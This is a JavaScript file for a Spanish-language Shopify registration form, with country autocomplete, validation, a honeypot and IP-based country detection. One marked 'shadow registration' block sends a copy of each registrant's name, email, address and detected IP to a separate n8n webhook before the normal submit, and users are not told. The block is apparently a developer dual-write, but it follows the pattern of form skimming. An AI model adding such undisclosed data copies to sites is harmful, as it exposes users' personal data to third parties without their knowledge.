(function () {
  "use strict";

  // Solo ejecutar si estamos en una sección de registro de Shopify
  const registrationSection = document.querySelector(".registration-section");
  if (!registrationSection) return;

  const COUNTRIES = [
    { code: "AF", name: "Afganistán" },
    { code: "AL", name: "Albania" },
    { code: "DE", name: "Alemania" },
    { code: "AD", name: "Andorra" },
    { code: "AO", name: "Angola" },
    { code: "AI", name: "Anguila" },
    { code: "AQ", name: "Antártida" },
    { code: "AG", name: "Antigua y Barbuda" },
    { code: "SA", name: "Arabia Saudita" },
    { code: "DZ", name: "Argelia" },
    { code: "AR", name: "Argentina" },
    { code: "AM", name: "Armenia" },
    { code: "AW", name: "Aruba" },
    { code: "AU", name: "Australia" },
    { code: "AT", name: "Austria" },
    { code: "AZ", name: "Azerbaiyán" },
    { code: "BS", name: "Bahamas" },
    { code: "BD", name: "Bangladés" },
    { code: "BB", name: "Barbados" },
    { code: "BH", name: "Baréin" },
    { code: "BE", name: "Bélgica" },
    { code: "BZ", name: "Belice" },
    { code: "BJ", name: "Benín" },
    { code: "BM", name: "Bermudas" },
    { code: "BY", name: "Bielorrusia" },
    { code: "BO", name: "Bolivia" },
    { code: "BA", name: "Bosnia y Herzegovina" },
    { code: "BW", name: "Botsuana" },
    { code: "BR", name: "Brasil" },
    { code: "BN", name: "Brunéi" },
    { code: "BG", name: "Bulgaria" },
    { code: "BF", name: "Burkina Faso" },
    { code: "BI", name: "Burundi" },
    { code: "BT", name: "Bután" },
    { code: "CV", name: "Cabo Verde" },
    { code: "KH", name: "Camboya" },
    { code: "CM", name: "Camerún" },
    { code: "CA", name: "Canadá" },
    { code: "QA", name: "Catar" },
    { code: "TD", name: "Chad" },
    { code: "CL", name: "Chile" },
    { code: "CN", name: "China" },
    { code: "CY", name: "Chipre" },
    { code: "VA", name: "Ciudad del Vaticano" },
    { code: "CO", name: "Colombia" },
    { code: "KM", name: "Comoras" },
    { code: "CG", name: "Congo" },
    { code: "KP", name: "Corea del Norte" },
    { code: "KR", name: "Corea del Sur" },
    { code: "CR", name: "Costa Rica" },
    { code: "HR", name: "Croacia" },
    { code: "CU", name: "Cuba" },
    { code: "CW", name: "Curazao" },
    { code: "DK", name: "Dinamarca" },
    { code: "DM", name: "Dominica" },
    { code: "EC", name: "Ecuador" },
    { code: "EG", name: "Egipto" },
    { code: "SV", name: "El Salvador" },
    { code: "AE", name: "Emiratos Árabes Unidos" },
    { code: "ER", name: "Eritrea" },
    { code: "SK", name: "Eslovaquia" },
    { code: "SI", name: "Eslovenia" },
    { code: "ES", name: "España" },
    { code: "US", name: "Estados Unidos" },
    { code: "EE", name: "Estonia" },
    { code: "ET", name: "Etiopía" },
    { code: "PH", name: "Filipinas" },
    { code: "FI", name: "Finlandia" },
    { code: "FJ", name: "Fiyi" },
    { code: "FR", name: "Francia" },
    { code: "GA", name: "Gabón" },
    { code: "GM", name: "Gambia" },
    { code: "GE", name: "Georgia" },
    { code: "GH", name: "Ghana" },
    { code: "GI", name: "Gibraltar" },
    { code: "GD", name: "Granada" },
    { code: "GR", name: "Grecia" },
    { code: "GL", name: "Groenlandia" },
    { code: "GP", name: "Guadalupe" },
    { code: "GU", name: "Guam" },
    { code: "GT", name: "Guatemala" },
    { code: "GF", name: "Guayana Francesa" },
    { code: "GG", name: "Guernsey" },
    { code: "GN", name: "Guinea" },
    { code: "GQ", name: "Guinea Ecuatorial" },
    { code: "GW", name: "Guinea-Bisáu" },
    { code: "GY", name: "Guyana" },
    { code: "HT", name: "Haití" },
    { code: "HN", name: "Honduras" },
    { code: "HK", name: "Hong Kong" },
    { code: "HU", name: "Hungría" },
    { code: "IN", name: "India" },
    { code: "ID", name: "Indonesia" },
    { code: "IQ", name: "Irak" },
    { code: "IR", name: "Irán" },
    { code: "IE", name: "Irlanda" },
    { code: "BV", name: "Isla Bouvet" },
    { code: "IM", name: "Isla de Man" },
    { code: "CX", name: "Isla de Navidad" },
    { code: "NF", name: "Isla Norfolk" },
    { code: "IS", name: "Islandia" },
    { code: "AX", name: "Islas Åland" },
    { code: "KY", name: "Islas Caimán" },
    { code: "CC", name: "Islas Cocos" },
    { code: "CK", name: "Islas Cook" },
    { code: "FO", name: "Islas Feroe" },
    { code: "GS", name: "Islas Georgias del Sur y Sandwich del Sur" },
    { code: "HM", name: "Islas Heard y McDonald" },
    { code: "FK", name: "Islas Malvinas" },
    { code: "MP", name: "Islas Marianas del Norte" },
    { code: "MH", name: "Islas Marshall" },
    { code: "PN", name: "Islas Pitcairn" },
    { code: "SB", name: "Islas Salomón" },
    { code: "TC", name: "Islas Turcas y Caicos" },
    { code: "UM", name: "Islas ultramarinas de Estados Unidos" },
    { code: "VG", name: "Islas Vírgenes Británicas" },
    { code: "VI", name: "Islas Vírgenes de los Estados Unidos" },
    { code: "IL", name: "Israel" },
    { code: "IT", name: "Italia" },
    { code: "JM", name: "Jamaica" },
    { code: "JP", name: "Japón" },
    { code: "JE", name: "Jersey" },
    { code: "JO", name: "Jordania" },
    { code: "KZ", name: "Kazajistán" },
    { code: "KE", name: "Kenia" },
    { code: "KG", name: "Kirguistán" },
    { code: "KI", name: "Kiribati" },
    { code: "KW", name: "Kuwait" },
    { code: "LA", name: "Laos" },
    { code: "LS", name: "Lesoto" },
    { code: "LV", name: "Letonia" },
    { code: "LB", name: "Líbano" },
    { code: "LR", name: "Liberia" },
    { code: "LY", name: "Libia" },
    { code: "LI", name: "Liechtenstein" },
    { code: "LT", name: "Lituania" },
    { code: "LU", name: "Luxemburgo" },
    { code: "MO", name: "Macao" },
    { code: "MK", name: "Macedonia del Norte" },
    { code: "MG", name: "Madagascar" },
    { code: "MY", name: "Malasia" },
    { code: "MW", name: "Malaui" },
    { code: "MV", name: "Maldivas" },
    { code: "ML", name: "Malí" },
    { code: "MT", name: "Malta" },
    { code: "MA", name: "Marruecos" },
    { code: "MQ", name: "Martinica" },
    { code: "MU", name: "Mauricio" },
    { code: "MR", name: "Mauritania" },
    { code: "YT", name: "Mayotte" },
    { code: "MX", name: "México" },
    { code: "FM", name: "Micronesia" },
    { code: "MD", name: "Moldavia" },
    { code: "MC", name: "Mónaco" },
    { code: "MN", name: "Mongolia" },
    { code: "ME", name: "Montenegro" },
    { code: "MS", name: "Montserrat" },
    { code: "MZ", name: "Mozambique" },
    { code: "MM", name: "Myanmar" },
    { code: "NA", name: "Namibia" },
    { code: "NR", name: "Nauru" },
    { code: "NP", name: "Nepal" },
    { code: "NI", name: "Nicaragua" },
    { code: "NE", name: "Níger" },
    { code: "NG", name: "Nigeria" },
    { code: "NU", name: "Niue" },
    { code: "NO", name: "Noruega" },
    { code: "NC", name: "Nueva Caledonia" },
    { code: "NZ", name: "Nueva Zelanda" },
    { code: "OM", name: "Omán" },
    { code: "NL", name: "Países Bajos" },
    { code: "PK", name: "Pakistán" },
    { code: "PW", name: "Palaos" },
    { code: "PS", name: "Palestina" },
    { code: "PA", name: "Panamá" },
    { code: "PG", name: "Papúa Nueva Guinea" },
    { code: "PY", name: "Paraguay" },
    { code: "PE", name: "Perú" },
    { code: "PF", name: "Polinesia Francesa" },
    { code: "PL", name: "Polonia" },
    { code: "PT", name: "Portugal" },
    { code: "PR", name: "Puerto Rico" },
    { code: "GB", name: "Reino Unido" },
    { code: "CF", name: "República Centroafricana" },
    { code: "CZ", name: "República Checa" },
    { code: "CD", name: "República Democrática del Congo" },
    { code: "DO", name: "República Dominicana" },
    { code: "RE", name: "Reunión" },
    { code: "RW", name: "Ruanda" },
    { code: "RO", name: "Rumania" },
    { code: "RU", name: "Rusia" },
    { code: "EH", name: "Sahara Occidental" },
    { code: "WS", name: "Samoa" },
    { code: "AS", name: "Samoa Americana" },
    { code: "BL", name: "San Bartolomé" },
    { code: "KN", name: "San Cristóbal y Nieves" },
    { code: "SM", name: "San Marino" },
    { code: "MF", name: "San Martín" },
    { code: "PM", name: "San Pedro y Miquelón" },
    { code: "VC", name: "San Vicente y las Granadinas" },
    { code: "SH", name: "Santa Elena" },
    { code: "LC", name: "Santa Lucía" },
    { code: "ST", name: "Santo Tomé y Príncipe" },
    { code: "SN", name: "Senegal" },
    { code: "RS", name: "Serbia" },
    { code: "SC", name: "Seychelles" },
    { code: "SL", name: "Sierra Leona" },
    { code: "SG", name: "Singapur" },
    { code: "SX", name: "Sint Maarten" },
    { code: "SY", name: "Siria" },
    { code: "SO", name: "Somalia" },
    { code: "LK", name: "Sri Lanka" },
    { code: "ZA", name: "Sudáfrica" },
    { code: "SD", name: "Sudán" },
    { code: "SS", name: "Sudán del Sur" },
    { code: "SE", name: "Suecia" },
    { code: "CH", name: "Suiza" },
    { code: "SR", name: "Surinam" },
    { code: "SJ", name: "Svalbard y Jan Mayen" },
    { code: "SZ", name: "Suazilandia" },
    { code: "TH", name: "Tailandia" },
    { code: "TW", name: "Taiwán" },
    { code: "TZ", name: "Tanzania" },
    { code: "TJ", name: "Tayikistán" },
    { code: "IO", name: "Territorio Británico del Océano Índico" },
    { code: "TF", name: "Territorios Australes Franceses" },
    { code: "TL", name: "Timor Oriental" },
    { code: "TG", name: "Togo" },
    { code: "TK", name: "Tokelau" },
    { code: "TO", name: "Tonga" },
    { code: "TT", name: "Trinidad y Tobago" },
    { code: "TN", name: "Túnez" },
    { code: "TM", name: "Turkmenistán" },
    { code: "TR", name: "Turquía" },
    { code: "TV", name: "Tuvalu" },
    { code: "UA", name: "Ucrania" },
    { code: "UG", name: "Uganda" },
    { code: "UY", name: "Uruguay" },
    { code: "UZ", name: "Uzbekistán" },
    { code: "VU", name: "Vanuatu" },
    { code: "VE", name: "Venezuela" },
    { code: "VN", name: "Vietnam" },
    { code: "WF", name: "Wallis y Futuna" },
    { code: "YE", name: "Yemen" },
    { code: "DJ", name: "Yibuti" },
    { code: "ZM", name: "Zambia" },
    { code: "ZW", name: "Zimbabue" },
  ];

  const VALIDATION_RULES = {
    fullName: {
      minLength: 3,
      errorMessage:
        "Por favor, ingresa un nombre completo válido (mínimo 3 caracteres).",
    },
    email: {
      regex: /^[^\s@]+@[^\s@]+\.[^\s@]+$/,
      errorMessage: "Por favor, ingresa un correo electrónico válido.",
    },
    password: {
      minLength: 8,
      errorMessage: "La contraseña debe tener al menos 8 caracteres.",
    },
    privacy: {
      checked: true,
      errorMessage: "Debe aceptar la política de privacidad.",
    },
  };

  let DOM = {};
  let ALERT_MESSAGES = {};
  let DETECTED_LOCATION = {};

  function initializeDOM() {
    DOM = {
      form: registrationSection.querySelector("#registrationForm"),
      countryInput: registrationSection.querySelector("#countryInput"),
      countryHidden: registrationSection.querySelector("#country"),
      countryList: registrationSection.querySelector("#countryList"),
      alertContainer: registrationSection.querySelector("#alertContainer"),
      detectedCountry: registrationSection.querySelector("#detectedCountry"),
      detectedCountryCode: registrationSection.querySelector(
        "#detectedCountryCode",
      ),
      detectedIpAddress:
        registrationSection.querySelector("#detectedIpAddress"),
    };

    // Obtener los mensajes de error desde los data attributes
    if (DOM.form) {
      ALERT_MESSAGES = {
        error:
          DOM.form.dataset.errorService ||
          "Ha ocurrido un error en el servicio. Por favor, inténtalo más tarde.",
        exist:
          DOM.form.dataset.errorExists ||
          "Los datos ingresados ya están registrados en el sistema. Por favor, utiliza otra información o inicia sesión.",
        email:
          DOM.form.dataset.errorEmail ||
          "Ha ocurrido un error, pero recibirás un correo electrónico con la URL de acceso.",
      };
    }
  }

  function getURLParameter(name) {
    const urlParams = new URLSearchParams(window.location.search);
    return urlParams.get(name);
  }

  function createAlertElement(type, message) {
    const alert = document.createElement("div");
    let alertType = "error";

    if (type === "exist") {
      alertType = "warning";
    } else if (type === "email") {
      alertType = "info";
    }

    alert.className = `alert alert-${alertType}`;
    alert.textContent = message;
    return alert;
  }

  function displayURLAlert() {
    const status = getURLParameter("status");
    if (status && ALERT_MESSAGES[status]) {
      const alert = createAlertElement(status, ALERT_MESSAGES[status]);
      DOM.alertContainer.appendChild(alert);
    }
  }

  function createCountryOption(country, onSelect) {
    const div = document.createElement("div");
    div.className = "country-option";
    div.textContent = country.name;
    div.dataset.code = country.code;
    div.dataset.name = country.name;
    div.addEventListener("click", () => onSelect(country));
    return div;
  }

  function initializeCountryList() {
    COUNTRIES.forEach((country) => {
      const option = createCountryOption(country, selectCountry);
      DOM.countryList.appendChild(option);
    });
  }

  function filterCountries(searchTerm) {
    const options = DOM.countryList.querySelectorAll(".country-option");
    let hasVisibleOptions = false;

    options.forEach((option) => {
      const countryName = option.dataset.name.toLowerCase();
      const isMatch = countryName.includes(searchTerm.toLowerCase());

      option.style.display = isMatch ? "block" : "none";
      if (isMatch) hasVisibleOptions = true;
    });

    return hasVisibleOptions;
  }

  function toggleCountryList(show) {
    DOM.countryList.classList.toggle("show", show);
  }

  function selectCountry(country) {
    DOM.countryInput.value = country.name;
    DOM.countryHidden.value = country.code;
    DOM.countryHidden.dataset.displayName = country.name;
    toggleCountryList(false);
    clearError("country");
  }

  function handleCountryInput(event) {
    const searchTerm = event.target.value.trim();
    const hasVisibleOptions = filterCountries(searchTerm);

    toggleCountryList(searchTerm && hasVisibleOptions);

    if (DOM.countryInput.value !== DOM.countryHidden.dataset.displayName) {
      DOM.countryHidden.value = "";
    }
  }

  function handleCountryFocus(event) {
    if (event.target.value.trim()) {
      toggleCountryList(true);
    }
  }

  function handleDocumentClick(event) {
    const isCountryInput = DOM.countryInput.contains(event.target);
    const isCountryList = DOM.countryList.contains(event.target);

    if (!isCountryInput && !isCountryList) {
      toggleCountryList(false);
    }
  }

  function validateByMinLength(value, minLength) {
    return value.length >= minLength;
  }

  function validateByRegex(value, regex) {
    return regex.test(value);
  }

  function validateCountryField() {
    return DOM.countryHidden.value !== "";
  }

  function validateField(field) {
    const value = field.value.trim();
    const fieldId = field.id;
    let isValid = true;
    let errorMessage = "";

    if (fieldId === "privacy") {
      if (!field.checked) {
        isValid = false;
        errorMessage = "Debe aceptar la política de privacidad.";
      }
    }

    if (fieldId === "countryInput") {
      isValid = validateCountryField();
      errorMessage = "Por favor, selecciona un país de la lista.";
    } else if (VALIDATION_RULES[fieldId]) {
      const rule = VALIDATION_RULES[fieldId];

      if (rule.minLength) {
        isValid = validateByMinLength(value, rule.minLength);
      } else if (rule.regex) {
        isValid = validateByRegex(value, rule.regex);
      } else if (rule.checked !== undefined) {
        isValid = field.checked === rule.checked;
      }

      errorMessage = rule.errorMessage;
    }

    const targetFieldId = fieldId === "countryInput" ? "country" : fieldId;

    if (!isValid) {
      showError(targetFieldId, errorMessage);
      field.classList.add("error");
    } else {
      clearError(targetFieldId);
      field.classList.remove("error");
    }

    return isValid;
  }

  function showError(fieldId, message) {
    const errorElement = registrationSection.querySelector(
      "#" + fieldId + "Error",
    );
    if (errorElement) {
      errorElement.textContent = message;
      errorElement.classList.add("show");
    }
  }

  function clearError(fieldId) {
    const errorElement = registrationSection.querySelector(
      "#" + fieldId + "Error",
    );
    if (errorElement) {
      errorElement.classList.remove("show");
    }
  }

  function handleFieldBlur(event) {
    validateField(event.target);
  }

  function handleFieldInput(event) {
    if (event.target.classList.contains("error")) {
      validateField(event.target);
    }
  }

  function isHoneypotFilled() {
    const honeypot = registrationSection.querySelector("#website");
    return honeypot && honeypot.value !== "";
  }

  function validateAllFields(fieldsToValidate) {
    let isFormValid = true;

    fieldsToValidate.forEach((fieldId) => {
      const field = registrationSection.querySelector("#" + fieldId);
      if (field && !validateField(field)) {
        isFormValid = false;
      }
    });

    return isFormValid;
  }

  function scrollToFirstError() {
    const firstError = registrationSection.querySelector(".error");
    if (firstError) {
      firstError.scrollIntoView({ behavior: "smooth", block: "center" });
      firstError.focus();
    }
  }

  // VERA_SHADOW_REGISTRATION_V1_BEGIN — rollback: restore original submit handler.
  function buildRegistrationPayload(form, sourcePath, registrationId, submittedAt) {
  const read = id => String(form.querySelector('#' + id)?.value ?? '').trim();
  return {
    schema_version: '1', registration_id: registrationId,
    fullName: read('fullName'), email: read('email'), country: read('country'),
    countryDisplay: read('countryInput'), address: read('address'), population: read('population'),
    postalCode: read('postalCode'), province: read('province'),
    detectedCountry: read('detectedCountry'), detectedCountryCode: read('detectedCountryCode'),
    detectedIpAddress: read('detectedIpAddress'), source_path: sourcePath,
    privacy_accepted: String(form.querySelector('#privacy')?.checked === true),
    client_submitted_at: submittedAt
  };
}
  async function sendRegistrationCopy(payload, endpoint, env = globalThis) {
  const controller = new env.AbortController();
  const timeout = env.setTimeout(() => controller.abort(), 2500);
  try {
    const response = await env.fetch(endpoint, {
      method: 'POST', mode: 'cors', credentials: 'omit', redirect: 'error',
      referrerPolicy: 'no-referrer', signal: controller.signal,
      headers: { 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8' },
      body: new URLSearchParams(payload).toString()
    });
    if (!response.ok) return false;
    const ack = await response.json();
    return ack.accepted === true && ack.registration_id === payload.registration_id;
  } catch { return false; }
  finally { env.clearTimeout(timeout); }
}
  let veraRegistrationInFlight = false;
  async function handleFormSubmit(event) {
    event.preventDefault();
    if (isHoneypotFilled() || veraRegistrationInFlight) return false;
    if (!validateAllFields(["fullName", "email", "countryInput", "password", "privacy"])) {
      scrollToFirstError();
      return false;
    }
    veraRegistrationInFlight = true;
    try {
      const payload = buildRegistrationPayload(DOM.form, window.location.pathname,
        window.crypto.randomUUID(), new Date().toISOString());
      const stored = await sendRegistrationCopy(payload, "https://anabelotero.app.n8n.cloud/webhook/vera-registro-shadow-1fd120fa-88eb-442d-9000-716b94c09cba");
      DOM.form.dataset.veraShadowCapture = stored ? 'stored' : 'not_confirmed';
    } catch {
      DOM.form.dataset.veraShadowCapture = 'not_confirmed';
    } finally {
      // Preserve existing account creation, password handling and payment redirect.
      // This shadow branch cannot block signup; failed capture needs reconciliation.
      DOM.form.submit();
    }
  }
  // VERA_SHADOW_REGISTRATION_V1_END

  function attachFieldValidation(fieldId) {
    const field = registrationSection.querySelector("#" + fieldId);
    if (field) {
      field.addEventListener("blur", handleFieldBlur);
      field.addEventListener("input", handleFieldInput);
      if (field.type === "checkbox") {
        field.addEventListener("change", handleFieldBlur);
      }
    }
  }

  function initializeFieldValidation() {
    const fieldsToValidate = [
      "fullName",
      "email",
      "countryInput",
      "password",
      "privacy",
    ];

    fieldsToValidate.forEach(attachFieldValidation);
  }

  function attachEventListeners() {
    if (!DOM.form) return;

    DOM.countryInput.addEventListener("input", handleCountryInput);
    DOM.countryInput.addEventListener("focus", handleCountryFocus);
    document.addEventListener("click", handleDocumentClick);
    DOM.form.addEventListener("submit", handleFormSubmit);
  }

  async function autoDetectCountry() {
    try {
      const response = await fetch(
        "https://n8n.plenamente.tv/webhook/abd3e04c-830c-4dd8-8f8b-2d963066008f",
      );

      if (!response.ok) {
        console.warn(
          "No se pudo detectar el país automáticamente, usando ES por defecto",
        );
        selectCountryByCode("ES");
        populateDetectedLocationFields("ES", "España", "");
        return;
      }

      const data = await response.json();
      const countryCode = data.countryCode || data.code;
      const country = data.country;
      const ipAddress = data.ipAddress || "";

      if (!countryCode) {
        console.warn(
          "No se recibió countryCode en la respuesta, usando ES por defecto",
        );
        selectCountryByCode("ES");
        populateDetectedLocationFields("ES", "España", ipAddress);
        return;
      }

      // Buscar el país en el array COUNTRIES
      const detectedCountry = COUNTRIES.find((c) => c.code === countryCode);

      if (detectedCountry) {
        // Auto-seleccionar el país
        selectCountry(detectedCountry);
        populateDetectedLocationFields(
          countryCode,
          country || detectedCountry.name,
          ipAddress,
        );
      } else {
        console.warn(
          `País con código ${countryCode} no encontrado, usando ES por defecto`,
        );
        selectCountryByCode("ES");
        populateDetectedLocationFields("ES", "España", ipAddress);
      }
    } catch (error) {
      console.warn(
        "Error al detectar país automáticamente, usando ES por defecto:",
        error,
      );
      selectCountryByCode("ES");
      populateDetectedLocationFields("ES", "España", "");
    }
  }

  function populateDetectedLocationFields(countryCode, country, ipAddress) {
    DETECTED_LOCATION = {
      countryCode: countryCode,
      country: country,
      ipAddress: ipAddress,
    };

    if (DOM.detectedCountryCode) {
      DOM.detectedCountryCode.value = countryCode;
    }
    if (DOM.detectedCountry) {
      DOM.detectedCountry.value = country;
    }
    if (DOM.detectedIpAddress) {
      DOM.detectedIpAddress.value = ipAddress;
    }
  }

  function selectCountryByCode(code) {
    const country = COUNTRIES.find((c) => c.code === code);
    if (country) {
      selectCountry(country);
    }
  }

  function initializeApp() {
    initializeDOM();

    if (!DOM.form) return;

    displayURLAlert();
    initializeCountryList();
    initializeFieldValidation();
    attachEventListeners();
    autoDetectCountry();
  }

  // Inicializar cuando el DOM esté listo
  if (document.readyState === "loading") {
    document.addEventListener("DOMContentLoaded", initializeApp);
  } else {
    initializeApp();
  }
})();
